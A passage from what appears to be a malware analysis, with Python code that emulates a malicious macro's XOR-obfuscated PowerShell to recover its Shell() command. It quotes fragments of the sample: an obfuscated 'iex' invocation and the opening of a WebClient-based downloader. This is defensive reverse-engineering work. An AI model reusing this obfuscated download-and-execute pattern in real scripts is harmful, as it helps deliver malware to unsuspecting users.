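    return env


def decode_payload(cmd):
    """Emulate '<nums>'.Split('<delims>') | % { [char]($_ -bxor KEY) } with $OFS=''.
    PowerShell binds String.Split(char[]) here, so every delimiter char splits."""
    nums, delims = PAYLOAD.search(cmd).groups()
    key = int(XORKEY.search(cmd).group(1), 0)           # '0x2f' -> 47
    tokens = re.split("[" + re.escape(delims) + "]", nums)
    return "".join(chr(int(t) ^ key) for t in tokens if t)


def recover(src):
    """Return (command line passed to Shell(), decoded inner PowerShell script)."""
    cmd = run_macro(src)["HRzmXFfCT"]
    return cmd, decode_payload(cmd)
```

recover(MACRO_EXCERPT) returns the command line that reaches Shell() (it begins `POwerSHell &( $pSHome[21]+$psHOmE[30]+'x')(`, the "iex" construction) and the decoded script, which opens with `$NUpoTz = new-object random;$FEOjlc = new-object System.Net.WebClient;`, a WebClient-based downloader whose URL list follows in the same string. Any URL that comes out of this decode is an artefact of the sample's own literals and should be handled as an IOC, not copied into prose without that caveat.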